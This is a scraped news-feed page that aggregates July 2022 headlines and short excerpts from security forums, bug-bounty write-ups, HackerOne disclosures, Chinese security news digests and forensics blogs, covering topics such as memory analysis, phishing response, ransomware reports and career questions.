    Very often, we view data sources as somewhat one dimensional, and don't think about how we can really get value from that data source. We're usually working on a case, just that investigation that's in front of us, and we're so "heads down" that we may not consider that what we see as a single data source, or an entry from that data source (artifact, indicator), is really much more useful, more valuable, than how we're used to viewing it. So, what am I talking about? Let's consider some of the common data sources we access during investigations, and how they're accessed. Consider something that we're looking at during an investigation...say, a data source that we often say (albeit incorrectly) indicates program execution: the "AppCompatCache", or "ShimCache". Let's say that we parse the App…
  • Open

    Extracting data from start and end addresses in memory.
    Hello all! I’ve hit a wall with volatility and am looking for advice on what I should do next. So far I have used the unloadedmodules plugin in volatility and have noticed some unloaded .sys files I want to carve out and analyze further. The plug-in displays the start and end address of the file in memory, but how do I use this information in volatility to carve out that section in memory? Any help would be greatly appreciated and thank you! submitted by /u/shikata_ganai [link] [comments]
  • Open

    How to deal with phishing incidents?
    One of my colleagues clicked on a malicious link and logged in with her business email credentials [business Gmail account]. When she found that the email is used for phishing, she changed her password and scanned the laptop. Fortunately, there was no malware downloaded. Are there any steps she should do besides what I already mentioned? submitted by /u/OmegaMan-PT [link] [comments]
    Mimikatz good starting point
    Hi, I used mimikatz sometimes (mostly CTFs), but I would like to better understand its concepts. Can someone recommend me a valid starting point (url, youtube video, ..)? Thank you submitted by /u/g-simon [link] [comments]
    Why are those collab tools such as Trello, Jira, Nortion neglected opened without any authentication procedure?
    Perhaps the collab tools are one of the most important servers that must be managed appropriately. But there are so many exposed, open collab tools without any authentication process. https://blog.criminalip.io/2022/07/01/collaboration-tool-vulnerability/ Default configuration should be more secure, but less. I'd say not even 10% of people using Jira or collab tools understand how authentication works between components. Always people think they're safe, it's not their turn. But this is the fundamental reason why the critical datasets of enterprises are sold on the dark web or forums. submitted by /u/scopedsecurity101 [link] [comments]
  • Open

    FreeBuf早报 | 苹果App Store存在大量欺诈应用;FBI将全面升级网络基础设施
    FBI对规划架构提出了大量具体的安全要求,如零信任、SASE、强隔离、可见性等。
    针对WordPress插件漏洞的攻击数量激增
    来自Wordfence的研究人员对近期高频率出现的针对WordPress Page Builder插件的网络攻击发出警告。
    利用恶意软件和钓鱼攻击,Roaming Mantis针对Android和iOS用户发起攻击
    在袭击德国、台湾、韩国、日本、美国和英国之后,Roaming Mantis将转向法国。
  • Open

    Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive
    Cloaked Ursa (aka APT29) has recently used trusted online storage services to deliver Cobalt Strike. The post Russian APT29 Hackers Use Online Storage Services, DropBox and Google Drive appeared first on Unit 42.
  • Open

    HTML Injection in E-mail Not Resolved ()
    Acronis disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1600720
  • Open

    A Simple Understanding of V8 Turbofan
    Author: TokameinE@Knownsec 404 Lab. Date: July 19, 2022. "JavaScript code itself is a binary program." I don't know whether readers have heard this explanation somewhere, but the author finds it quite vivid. Because JavaScript code is lazily interpreted, the interpreter only interprets a given piece of code and generates the corresponding bytecode when a particular function is executed. But this bytecode changes as the code runs; the same code may, within a single execution...
    Pocsuite3 Tutorial for beginners
    Author: Knownsec 404 Team Chinese version: https://paper.seebug.org/1931/ 1 Introduction Pocsuite3 is a remote vulnerability testing framework based on GPLv2 license and open source created by Kno...
  • Open

    Good things takes time | Story of my first “valid” critical bug!
    No content preview
    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    No content preview
  • Open

    Bunch of classical and Church music
    https://dataup.sdasofia.org/MUSIC/ submitted by /u/chloroformica [link] [comments]
    How to search better than the OD search sites?
    I use all of the open directory search sites, and I do find what I'm looking for, but is there another method? For example, like using google dorks to find files, or some kind of python script etc? submitted by /u/G-Streams [link] [comments]
  • Open

    Which browser is the best to start with? Chrome, Edge, Firefox etc
    I’ve spent the last few months going through the different classes of memory corruption vulns + writing exploits for different CVE’s and want to start diving into VR. Which browser is the most noob friendly? Should I even be targeting browsers at this point in my learning? submitted by /u/Amullatoavibrato [link] [comments]

  • Open

    PDFs of literature in the public domain
    submitted by /u/Nerditter [link] [comments]
    3d modelling stuff
    submitted by /u/PM_ME_TO_PLAY_A_GAME [link] [comments]
    Question
    Is there a directory of 3d models from sketchfab or anything? (specifically paid ones) Or is there a current reddit post that has a directory of 3d models? Or subreddit? Hopefully I'm not breaking the 2nd rule. submitted by /u/Particular_Bed2427 [link] [comments]
  • Open

    Unit 42 Threat Group Naming Update
    Threat group naming helps track and identify attackers' activities. Unit 42 is looking to the stars for an updated approach. The post Unit 42 Threat Group Naming Update appeared first on Unit 42.
  • Open

    new privesc on AWS (DataScientist policy)
    submitted by /u/stk_ [link] [comments]
    /r/netsec's Q3 2022 Information Security Hiring Thread
    Overview If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company. We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education. Please reserve top level comments for those posting open positions. Rules & Guidelines Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work. If you are a third party recruiter, you must disclose this in your posting. Please be thorough and upfront with the position details. Use of non-hr'd (realistic) requirements is encouraged. While it's fine to link to the position on your company's website, provide the important details in the comment. Mention if applicants should apply officially through HR, or directly through you. Please clearly list citizenship, visa, and security clearance requirements. You can see an example of acceptable posts by perusing past hiring threads. Feedback Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.) submitted by /u/ranok [link] [comments]
    unRAR CVE-2022-30333 deep dive (including full exploit for Zimbra)
    submitted by /u/iagox86 [link] [comments]
    Disrupting Kill Chains with Just-in-Time Access Environments
    submitted by /u/mesok8 [link] [comments]
    Building a process to evaluate security tools
    submitted by /u/LivingInSyn [link] [comments]
    A Deep Dive Into ALPHV/BlackCat Ransomware
    submitted by /u/CyberMasterV [link] [comments]
    Research: Auditing WordPress Plugins (35 CVEs in 3 months)
    submitted by /u/andersonmvd [link] [comments]
  • Open

    How can I block Venntel / Gravy Analytics?
    Venntel and Gravy Analytics use app integration to harvest and sell location data. How can I block this data leak using a firewall rule? Is there a way to know if an app installed on my iPhone or Android reports to Venntel or Gravy Analytics? The bulk of the location data ... came from its contract with Venntel, a location data broker based in Virginia. Venntel is a subsidiary of Gravy Analytics, an advertising company that specializes in location data. Gravy Analytics is the leading provider of real-world location intelligence for marketers. ... verifies consumer attendances at millions of places, points-of-interest, and local events, providing unprecedented visibility into the offline consumer journey. Gravy Analytics processes billions of pseudonymous, mobile location signals every day from millions of mobile devices to understand where people go and why. The analytics application platform turns location data into intelligence.... Venntel draws its data from mobile applications such as weather trackers and mobile games, which require location access to play. The company that originally collected that information then sells the data.... submitted by /u/Janice_2022 [link] [comments]
    how to clean up a wordlist?
    I have used crunch to generate an 8-digit wordlist, and I would like to remove any result that has a single number repeated sequentially more than 4 times. For example, I want to keep these: 0034001 2227422 but remove these: 0000341 2222274 What is the best way to do that? For now, I'm thinking of making another wordlist containing these results and subtracting them from the main wordlist using: comm -2 redundant.txt main.txt > cleaned.txt. But I was wondering if there is a better way. Thanks submitted by /u/gamer121323 [link] [comments]
    Does anyone know any free database for URL categorisation?
    As per title - I am aware that these might not be curated, complete or 100% reliable - I was wondering if anyone knows any open source database/collection for URL categorisation. The use case is: given a URL, determine if it points to a) malicious website/IP b) adult content c) religious - just to name a few examples. I am aware that there are resources for a specific use case (malicious IP, websites) and/or there are paid options that address this. submitted by /u/OneEyedMerchant [link] [comments]
    How much karma is needed to post to r/netsec? how old does the account have to be?
    I tried to post content with a fresh account, but the post just gets auto-flagged as spam. When trying to reach out to the mods, the account was either suspended or the mods are rejecting direct messages. Quite at a loss here? Is there a guideline on how much karma an account needs or how old an account has to be to post to r/netsec? TIA. submitted by /u/haxflilet [link] [comments]

    Hacking Facebook Invoice: How I could’ve bought anything for Free from Facebook Business Pages
    … Continue reading on InfoSec Write-ups »
    Busy Sunday Because Of Privilege escalation
How I was able to take over a whole website and get access to the accounts of all users, get access to sensitive data of all users, I was able to… Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
    Indonesia Continue reading on Medium »
Hey Google, let's submit a bug from the victim's account!
    Introduction: This is the story of how my bug bounty journey helped me to pay for my college fees. Continue reading on Medium »
    MSA Weekly 4 — “How to Get Subdomain’s Using Subfinder & Sudomy”
Subdomain enumeration is the process of finding subdomains and helps reveal domains/sub-domains where bugs are likely to appear… Continue reading on Medium »
    Good things take time | Story of my first “valid” critical bug!
    Hello there, I am Krishna Agarwal ( Kr1shna 4garwal ) from India 🇮🇳. An ordinary bug hunter and so-called security researcher :) Continue reading on Medium »
    Bug Bounty Program
    Resolve bugs … Continue reading on Medium »
    Bug Bounty: Blind XSS Payloads Explained
    This article was originally posted on bepractical.tech Continue reading on Medium »
    MSA Weekly 4 — [How to Get Subdomain’s Using Subfinder & Sudomy]
    Subdomain’s Enumeration Continue reading on Medium »

CVE-2022-35909 / CVE-2022-35910, Incorrect Access Control and Stored XSS in Jellyfin
    This vulnerability is in version 10.7.7 (fixed in 10.8.0). Continue reading on stolabs »

    War in Ukraine / July 15–17
    Day 145: Russia’s losses are at least 50,000 soldiers Continue reading on Medium »

    SecWiki News 2022-07-18 Review
SecWiki Weekly (Issue 437) by ourren. For more of the latest articles, visit SecWiki

Without verifying email and activating the account, a user can perform all actions which are not supposed to be possible
    Stripe disclosed a bug submitted by tabaahi: https://hackerone.com/reports/1272305 - Bounty: $100
    subdomain takeover at odoo-staging.exness.io
    EXNESS disclosed a bug submitted by omer: https://hackerone.com/reports/1540252 - Bounty: $100
    unauth mosquitto ( client emails, ips, license keys exposure )
    Acronis disclosed a bug submitted by second_grade_pentester: https://hackerone.com/reports/1578574 - Bounty: $150
    Cross-site scripting (DOM-based)
    OneWeb disclosed a bug submitted by thewikiii: https://hackerone.com/reports/1512644
    CVE-2019-11248 on http://...:9100/debug/pprof/goroutine
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1607940
    Public Apache Tomcat /examples example directory
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1622624

Industrial control systems: beware of password-cracking software for PLCs and HMIs
    This attack campaign uses password-cracker software to gain access to programmable logic controllers (PLCs), turning them into bots that join a botnet.
    FreeBuf Morning Report | Albanian government websites shut down due to a cyberattack; Tor Browser can automatically bypass internet censorship
    Albania's National Agency for Information Society said that, due to an attack by foreign hackers, Albanian government websites and online public service sites have been temporarily shut down.
    Book giveaway | Still don't understand zero trust? A copy of 《白话零信任》 (Zero Trust in Plain Language) for you
    With the arrival of the era of cloud computing and mobile work, traditional security models have gradually become ineffective, and "zero trust" has become the most widely recognized security architecture today.
    Vulnerability in Digium software exploited by threat actors to attack VoIP servers
    Unit 42 researchers discovered a campaign, active since December 2021, targeting the Elastix system used in Digium phones.
    Research finds attackers spreading malicious code on GitHub using forged timestamps and similar techniques
    Security vendors warn that developers need to be careful with open-source projects on GitHub, which may harbor malicious code.
    Premint NFT suffers the largest NFT hack in history
    The well-known NFT platform Premint NFT was breached, and attackers stole 314 NFTs.
    Tor Browser gets a major update and can automatically bypass internet censorship
    The Tor Project team announced the release of Tor Browser 11.5, and this update has just one purpose: helping users automatically bypass internet censorship.
    Key points of data compliance in the Philippines explained
    Enforcement of data compliance in the Philippines is strict and comprehensive, and its data protection legal framework is more complex than that of other countries.

Incident response to the new WebSocket memory shell
    Author: flamingo. Original link: https://mp.weixin.qq.com/s/T3UfA1plrlG-e9lgfB4whg A few days ago I saw a post about a new WebSocket memory shell. Because it registers itself under Ws, the usual in-memory detection script memshell scanner cannot detect it quickly. Project address: https://github.com/veo/wsMemShell To avoid getting caught out during incident response...

Linux tracing/profiling basics: symbol tables, call stacks, perf/bpftrace examples, etc. (2022)
    Some tracing/profiling notes, mainly drawn from the Practical Linux tracing series of articles. 1 Introduction 1.1 Hotspot and call-stack analysis (perf record/report/script) 1.2 Symbols 1.3 Summary 2 A minimal hello-world program: exploring symbols 2.1 C source 2.2 Compiling to an object file (without -g) 2.3 Inspecting the object file (objdump/readelf) 2.4 Tracing hello-world execution with bpftrace 2.5 Summary 3 Symbols 3.1 Dynamic symbols (.dynsym) vs. local symbols (.symtab) 3.2 stripped vs. not stripped 3.2.1 Manually removing local symbols (strip -s) 3.2.2 Tracing local functions with bpftrace again 4 Debug symbols (gcc -g): the DWARF format 4.1 Uses and functions of debug symbols 4.1.1 Function one: mapping memory addresses to specific source lines 4.1.2 Function two: stack unwinding 4.2 Some problems with the DWARF format 5 Stack unwinding (method two): frame pointer 5.1 Basic principle 5.2 Example 5.3 The problem: the default compile flag -fomit-frame-pointer 6 Profiling & tracing 6.1 Perf profiling 6.2 bpftrace profiling 6.3 bpftrace event tracing Kernel tracing User space tracing 7 /proc/ /* 7.1 /proc/<pi…


    Open Redirect .8x8.com
    8x8 disclosed a bug submitted by mr_k0anti: https://hackerone.com/reports/1637571
    Information disclosure ( Google Sales Channel )
    Shopify disclosed a bug submitted by hydraxanon82: https://hackerone.com/reports/1584718 - Bounty: $500

    Mock Investigations or Training Cases??
Anyone familiar with any sites or programs where you can try what you may know, and perhaps some that show you a disk image and may show you things that you may have missed? Nearly a year of General Ed classes since my last Forensics class has taken a toll and I'm trying to refresh. Any help would be appreciated. Thanks. submitted by /u/DeviantWolfe [link] [comments]
    PowerShell command history (windows forensics)
When running a PowerShell command or a ps1 script, what forensic evidence is left behind? I know of the event logs and general PowerShell history. Is there anywhere else that can be investigated to see if PowerShell commands have been executed? Or any particular artifacts to look for? Still new to Windows forensics, thanks in advance :) submitted by /u/EnormousJohnson [link] [comments]
    Where can I find useful system logs in windows and Linux beside the basic event viewer and journalctl logs?
I work on debugging system errors and want to get good at forensics. Where can I find good system logs? Sorry if it's a basic question. submitted by /u/iObjectUrHonor [link] [comments]

    A little bit of housekeeping please.
Apologies mods - not trying to add to any workload but there are a few glaring issues. Could we reroute the search box to either koalabear84's search or site:reddit.com/r/opendirectories %s? Either has pros and cons but reddit search is objectively shit. While we're at it - since we have to add a flair/tag when we post, could we not also implement a mandatory search in the posting process? I know reddit kinda implements this atm but again, its search is frankly fucking dismal. Finally: in the reporting dialog could we add a couple of entries: This has been reposted more times than that reaction pic of THIS IS NOT AN OPEN DIRECTORY EDITED. submitted by /u/ringofyre [link] [comments]

    Join the Morningstar's Discord Server! tells you ways to get free stuff from websites
    submitted by /u/nightmarejh10 [link] [comments]

    Finding 0-days in Enterprise Application
    No content preview
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »

    Finding 0-days in Enterprise Application
    A tale of ‘Site-wide Account Takeover’ Continue reading on InfoSec Write-ups »
    Gauing+Nuclei for Instant Bounties
    Back again with the instant bounties series. Last time we learned how to score instant bounties with Google dorks so check that out if you… Continue reading on Medium »
    FFUF-ing RECON
    , or how to get to P1–P3 from a slightly different recon Continue reading on InfoSec Write-ups »
    A Story Of My First Bug Bounty
    Hello everyone, Continue reading on Medium »
MSA Weekly 4 — “How to Get Subdomains Using Subfinder & Sudomy”
    In the penetration testing or hacking process there are several steps/workflows usually carried out by penetration testers or hackers before… Continue reading on Medium »
    Web Application Security & OWASP’s Juice Shop
    Throughout my entire IT career, I have always felt I lack programming and web development skills. This stems from the fact that I have… Continue reading on Medium »
    Intro to Bug Bounty Hunting.
    Hey Guys! Hope you all are doing great! Continue reading on Medium »
    A Simple Buffer Overflow Demonstration — Part 2
Hello Security folks, In the previous article, we came to know what a buffer overflow is, its types, and how it occurs. In this article… Continue reading on Medium »

    LSASS Memory Dump and Detection
    Basic Overview Continue reading on Medium »

    SecWiki News 2022-07-17 Review
Incident response capability improvement 6: incident response topic summary meeting by aerfa; Incident response capability improvement 5: review of incident response reports by aerfa; Incident response capability improvement 4: practical incident response experience by aerfa. For more of the latest articles, visit SecWiki

New RedAlert ransomware targets VMWare ESXi servers
    New RedAlert ransomware targets VMWare ESXi servers
    Research on payload construction approaches for Python web SSTI
    Preamble: I have been exposed to Python web SSTI for some time now, and my impression is that the principle is easy to understand, but exploiting it is always somewhat difficult (I cannot apply it flexibly). Thinking it over, the principle is still not clear enough to me, so in this article, from a beginner's perspective and starting from the principles
    A detailed explanation of tunnel and proxy usage in the SSH protocol
    A detailed explanation of the usage of tunnel connections and proxies in the SSH protocol
    SAFEIS: Tracing and analyzing the UNISWAP security incident!
    In the hacker attack on UNISWAP, many users suffered heavy losses, including some well-known figures.

    51 OSINT extensions for Chrome
    Let’s try to turn the standard CHROME browser into a full-fledged OSINT explorer tool. Continue reading on Medium »
    SPY NEWS: 2022 — Week 28
    Summary of the espionage-related news stories for the Week 28 (July 10–16) of 2022. Continue reading on Medium »
Identifying the recruiters of MyPertamina buzzers
    As of 1 July 2022, Pertamina has been trialling fuel purchases using the MyPertamina app. There have been many pros and cons in… Continue reading on Medium »
    Who’s this war against? Data from June
    Data suggests Russia’s attention in its invasion of Ukraine is directed more towards westward ‘unfriendly’ countries than to Ukraine… Continue reading on Medium »

    GitHub - karimhabush/cyberowl: A daily updated summary of the most frequent types of security incidents currently being reported from different sources.
    submitted by /u/karimhabush [link] [comments]
    Build your first LLVM Obfuscator
    submitted by /u/CyberMasterV [link] [comments]

    StartupApproved\Run, pt II
    On the heels of my last blog post on this topic, I had a couple of thoughts and insights that I wanted to research a bit, and then address. I wanted to take a look at ways that the StartupApproved\Run key might be impacted, so I started by grabbing the contents of that key based on what we saw from the previous post, which are illustrated in figure 1. Fig 1: StartupApproved\Run key contents Then, I captured the contents of the Run key, illustrated in figure 2. Fig 2: Run key contents As you can see in figure 2, there appears to be an entry missing, the "com.squirrel.Teams.Teams" value. We know from the previous blog post that this value was disabled on 14 Jul 2021, just over a year ago. I have no idea how that happened, as it wasn't part of an intentional test at the t…

    Basic BloodHound query for a single machine
Hi, I am practicing with some Active Directory labs (hackthebox); I downloaded stuff with Sharphound and imported it into my bloodhound installation. There are about 2k users and 500 computers in this lab. Let's say I would like to "start" with a specific computer name and look for the best path to compromise such a machine, how can I do that? What is the query syntax for searching a specific computer name? Thank you submitted by /u/g-simon [link] [comments]
    Can attacker gain access to my private network application through pivoting and/or lateral movement?
I am using a public wifi network to work on some web development. When I start a nodejs express server on my local machine at port 3000, I can access that website on another device (that is connected to the same public wifi network) by going to http://(private ip address of nodejs host assigned by public wifi dhcp):3000/index.html, for example. So to prevent this, I had my phone connect to the public wifi network and fired up the built-in android hotspot. Then I connected my nodejs host machine to the hotspot to start the express server at port 3000. I could no longer access that website from a different device on the public wifi network because the express server was now inside the private network within that public wifi network. I can ping from a device inside the android hotspot private network to a device in the public wifi network. But the device from the public wifi network could not ping devices inside the android hotspot private network. Is there a way for an attacker on that public wifi network to gain access to my android hotspot private network without knowing the SSID passphrase? Could they use some kind of network pivoting technique so that they can access my private html website on port 3000? Using something like ip route add? submitted by /u/Fuzzht1 [link] [comments]
    Practical malware analysis book versions
    Hey guys! I'm looking at getting the practical malware analysis book by Michael Sikorski and Andrew Honig, however there seems to be one published in 2012 and another in 2017. Does anyone know if there's any difference between the 2? I'm thinking maybe one is the ebook and the other paper but content the same. Cheers! submitted by /u/semening [link] [comments]


    An Overview of Exploit Dev Course Content
    submitted by /u/PM_ME_YOUR_SHELLCODE [link] [comments]

    New.Student.Help
Hi everyone, I’m a student new to cyber forensics. I have read up about file carving and hex carving but was wondering how the two are related. Is hex carving considered file carving? Or maybe a subset of file carving? Also, given a situation where you have to search a company’s file system to scrape all the images in a word document, how best would you approach this? Can hex carving or file carving be considered in this situation and if so, which is better? Thank you submitted by /u/EricaHellscythe [link] [comments]
    Mem dump with malware
    Does anyone know where I can get my hands on memory dump files with live malware on it? I tried running TheZoo on a VM, but I'm having trouble getting malware to detonate other than ransomware. I figured someone might know where I can get a .dmp file that already has the malware in it. Thank you! submitted by /u/DeadBirdRugby [link] [comments]
    New to Forensics, Drop some Forensics tools/training content
    I tried Autopsy and Volatility at a basic level, what else should I go for? submitted by /u/ItsMeTheBatman [link] [comments]
    When does SANS eat itself
Most SANS DFIR courses are now $7640 and with the exam fee of $949 they price out at $8589. I have attended multiple SANS events and currently hold two GIAC certs so I know the quality of the classes BUT... what is the tipping point? We're getting close to 10K for a one-week class. At some point it becomes unsustainable for most organizations. The DFIR training area seems ripe for disruption. Why isn't there any competition offering a similar product at a much better price point? submitted by /u/7174n6 [link] [comments]

Password reset: No Rate Limiting
    Hey guys, my name is RISHI NIKAM, I am a Security Researcher and bug bounty hunter Continue reading on Medium »
    First Bug Bounty from DOS: Taking the service down
    Hello friends, This is Faique, a security researcher & an ethical hacker from India, and this is a journey to my first bug bounty. Continue reading on Medium »
    CRLF to Account takeover (chaining bugs)
    Hi, everyone Continue reading on Medium »
    Authorization token leak from verify email endpoint
    While testing a website I found that the verify email endpoint was leaking the authorization tokens of any verified users by just passing… Continue reading on Medium »
    Local File Inclusion (interesting method)
Hello researchers, This is Captain_hook and I decided to share an interesting LFI vulnerability that I found in BC’s program. Continue reading on Medium »
    Subdomain takeover and Text injection on a 404 error page-$100 bounty
    Hello everyone! I’m Jeewan Bhatta and I am here with my first hackerone bug write-up. Hope you all are doing great. So now I am gonna tell… Continue reading on Medium »
    Business logic error
    I Can Delete your email, you can’t register on the website Continue reading on Medium »
    Bypass OTP by manipulating response parameters
In this real-life tutorial you will learn about a parameter manipulation vulnerability which can let hackers bypass OTP and finally… Continue reading on Medium »
    Bug hunting from a car on a cheap, mostly,
    Or, how I learned to hate typing on my phone Continue reading on Medium »

    What can I do to get hired as a SOC analyst?
Just passed Security+ and already have Network+, coming from an intelligence analysis background (metadata analysis, creating workflows with Python, threat research and development, etc.) and very serious about getting into network security. What can I do to improve my chances at landing a SOC analyst role? These are the things I'm planning on doing: Practicing SOC skills on letsdefend.io (and possibly also hackthebox and tryhackme) - more interested in blue team at the moment though. Building up my homelab (just ordered a modem and better router to replace my ISP-provided gear) and potentially setting up a syslog server and/or putting freeradius on my Pi (definitely overkill for a home network but it's to learn). 16 hour SOC core skills course with Antisyphon/Black Hills Security (this week!). What else can I be doing aside from the obvious (reading up about CVEs, cyber news, etc.) to land this SOC gig? Get another cert? CySA+? Linux+? GSEC? GSOC? (I can get reimbursed for some of the costs but they are expensive as heck). Thanks! submitted by /u/WLANtasticBeasts [link] [comments]
    Blue team bug bounty equivalent?
    Just wondering if there is some program like bug bounties but for blue team professionals. Edit: The characteristics of the bug bounty ideas such as doable on free time, accessible any time and earns you money. Idk what else to add but I think you get the idea. submitted by /u/Chroll-On [link] [comments]

    How Windows Processes Work - CreateProcess Workflow (Part 2)
    submitted by /u/sciencestudent99 [link] [comments]

    MS-Interloper: On the Subject of Malicious MSIs
    submitted by /u/dmchell [link] [comments]
    Process Injection using QueueUserAPC Technique in Windows
    submitted by /u/tbhaxor [link] [comments]

    SecWiki News 2022-07-16 Review
No news updates today~ For more of the latest articles, visit SecWiki

Can still use the Reddit Android app as usual even after revoking its access from reddit.com
    Reddit disclosed a bug submitted by sateeshn: https://hackerone.com/reports/1632186

    RouterSpace from HackTheBox — Detailed Walkthrough
    No content preview

    Decade old anarchy stuff.
    Again, sorry if it was already posted. https://www.hou2600.org/ftp/textfiles/ submitted by /u/RainyAbrar [link] [comments]
    Random 2010 stuff?
    Don't know if it's already posted. http://www.fricking.ninja/DIY/index/ submitted by /u/RainyAbrar [link] [comments]


    Null to Bug: Insecure Direct Object Reference
    What is Null to Bug? Continue reading on Medium »
    How I got CEH (Certified Ethical Hacker) Master Certified. (Resources included)
    Hello Infosec Family. I am Shubham Ghosh, an Information Security Analyst with an experience of 2+ years from Jharkhand, India. This… Continue reading on Medium »
    How I Got My First CVE
    Hello readers, Continue reading on Medium »
GOOD RECON LEADS TO SENSITIVE ACCOUNTS
    Hello people, I am back with a new hacking story! So yesterday I was hunting on one of the VDP programs, let’s consider it xyz.com. So… Continue reading on Medium »
    Ability to login as google staff in Google Cloud Community
    -Gaurav Bhatia (Bug Hunter, CTF Player) Continue reading on Medium »
    How I spammed a Google meet (But for good)
    Hacking isn’t always about account takeover, authentication bypass, or authorization abuse. Sometimes it’s about functionality abuse and… Continue reading on Medium »
    Information Source Code Disclosure Directory .git — MNC Play
On 15 October 2020 I found a SQL Injection BUG at payment.mncplay.id but there was no response from MNC Play. Continue reading on Medium »
    Paramspider lead to find SQLI vulnerability
    In this tutorial you will learn how real hackers can find injection vulnerabilities like : Continue reading on Medium »

    Huge directory of every skill site you can think of!
    submitted by /u/orphickalon [link] [comments]

    What is OSINT? Part — 1
    Do you use social media like Instagram, Facebook, Twitter, or Snapchat? Ahh, I know most of you are using it. Continue reading on Medium »
    War in Ukraine / July 14
    Day 142: Grain in exchange for the lifting of sanctions Continue reading on Medium »
    Holehe Transform using Maltego
    Overview Continue reading on Medium »

    Insecure Object Permissions for Guest User leads to access to internal documents!
    IBM disclosed a bug submitted by mocr7: https://hackerone.com/reports/1089583
    Add me email address Authentication bypass
    LinkedIn disclosed a bug submitted by raajeevrathnam: https://hackerone.com/reports/1607645
    POST BASED REFLECTED XSS IN dailydeals.mtn.co.za
    MTN Group disclosed a bug submitted by shuvam321: https://hackerone.com/reports/1451394
    [h1-2102] shopApps query from the graphql at /users/api returns all existing created apps, including private ones
    Shopify disclosed a bug submitted by inhibitor181: https://hackerone.com/reports/1085332 - Bounty: $1900

    What are some must-learn relevant concepts in C?
    Things like pointers, memory management etc? Thanks submitted by /u/UseFit [link] [comments]
    Do you have Microsoft 365 focused security blogs you follow?
    Hey folks, I'm trying to build out my RSS feed I browse each morning when I come in. I'm looking to build out a whole section dedicated to M365 security and was wondering if folks here had any go to blogs they like, either Microsoft or third party? submitted by /u/beagle_bathouse [link] [comments]
    How to parse Linux logs to Graylog?
    Hello, We already forwarded Linux logs to our Graylog syslog server (community version). However, the logs are not parsed. One option is to use extractors, but this approach is kinda manual and time-consuming. Is there any other way to parse the Linux logs properly? Thank you. submitted by /u/sanba06c [link] [comments]

    IOC-based threat hunting for free and without registration
    submitted by /u/Cultural_Budget6627 [link] [comments]

    SecWiki News 2022-07-15 Review
Attack and defense drills: domain controller hardening by ourren; Attack and defense drills: domain controller detection by ourren; Volcano Engine CWPP (Elkeid) real-world adversarial case sharing by ourren; Software supply chain security risk analysis research by ourren. For more of the latest articles, visit SecWiki

    Digium Phones Under Attack: Insight Into the Web Shell Implant
    We witnessed more than 500,000 unique samples of malicious traffic targeting Digium Asterisk software for VoIP phone devices. The post Digium Phones Under Attack: Insight Into the Web Shell Implant appeared first on Unit 42.

    PortSwigginar - 13 July
Thank you to those who attended our recent PortSwigginar on Burp Suite Enterprise Edition. Below is the video of the session, which included: A recap on “what’s new” within the product for those who h

IW Weekly #10: 5 Articles, 4 Threads, 3 Videos, 2 Github Repos, 1 Job Alert
    No content preview
    WiFi Hacking Week Pt. 4 — Evil Twin Attacks
    No content preview
    Android WebView Hacking — Enable WebView Debugging
    No content preview

Implementing JARM fingerprint obfuscation and randomization
    Author: 风起. This article is a contributed submission; Seebug Paper looks forward to your contributions, and every accepted submission receives a gift! Submission email: paper@seebug.org C2 identification based on JARM fingerprints: JARM works by actively sending 10 specially constructed TLS Client Hello packets to the target TLS server to elicit distinctive responses, capturing specific attributes of the TLS Server Hello responses, and then processing the aggregated TLS server responses in a specific way...

Microsoft discloses details of an Apple sandbox escape vulnerability
    Microsoft publicly disclosed technical details of an app sandbox access vulnerability in Apple systems, affecting iOS, iPadOS, macOS, tvOS and watchOS.
    Red team chronicles series (1): from NodeJS code audit to internal network breakthrough
    This write-up originated from a company red-versus-blue live exercise; first, full-port fingerprinting of the target assets was performed through distributed scanning on an internally developed asset platform.
    Mantis: the most powerful botnet to date
    Cloudflare announced that the record-breaking DDoS attack it mitigated last month originated from a new botnet named Mantis.
    Ransomware attack leaks 1.9 million medical records in the US
    Professional Finance Company (PFC), a US debt collection firm, reported a data breach.
    FreeBuf Morning Report | Bandai Namco confirms hacker intrusion; smart factories not prepared to respond to cyberattacks
    In June 2022, cybercrime reporting centers at all levels across China accepted 14.987 million reports, down 2.3% month-on-month and up 9.8% year-on-year.
    How to ensure files are transferred securely on the internal network? | FreeBuf enterprise (Party A) group topic discussion
    When enterprises transfer files via USB drives, cloud drives and the like, or through private internal-network domains, how can they ensure security?
    FreeBuf Weekly Report | Over 10,000 enterprises hit by phishing attacks; multiple Honda models have vulnerabilities that allow vehicles to be controlled remotely
    Happy weekend, FreeBufers~ We have summarized and recommended this week's hot news, quality articles and handy tools, ensuring you don't miss any of this week's highlights!

    IDA Plugin to reconstruct .proto files used in the analyzed binary
    submitted by /u/Martypx00 [link] [comments]
    CVE-2022-29593
    submitted by /u/9lyph [link] [comments]

    CVE-2022-29593 – Authentication Bypass by Capture Replay (Dingtian-DT-R002)
    Article URL: https://github.com/9lyph/CVE-2022-29593 Comments URL: https://news.ycombinator.com/item?id=32105629 Points: 1 # Comments: 0

    Malicious Steganography
    How to inject malicious powershell scripts into an image? Continue reading on Medium »


    Healthcare IT: Encrypt PHI Traffic Inside the Network?
For those of you in healthcare IT, do you encrypt your interface transmissions inside your network? Encryption: External vs. Internal Traffic We'd all agree that unencrypted PHI can't be sent/shouldn't be sent over the internet. All external connections require a VPN or other encryption. For internal traffic, some/many organizations consider encryption as not needed. Instead, they rely on network and server protections to, "implement one or more alternative security measures to accomplish the same purpose." Without encryption, however, the internal network carries a tremendous amount of PHI as plain text. What is your organization doing vs. the below? HIPAA Encryption Requirement If an HIT org does not encrypt PHI, either in-motion or at rest, it must: Document its alternative …
    Side-hustling as VAPT freelancer, any advice? also discussion :)
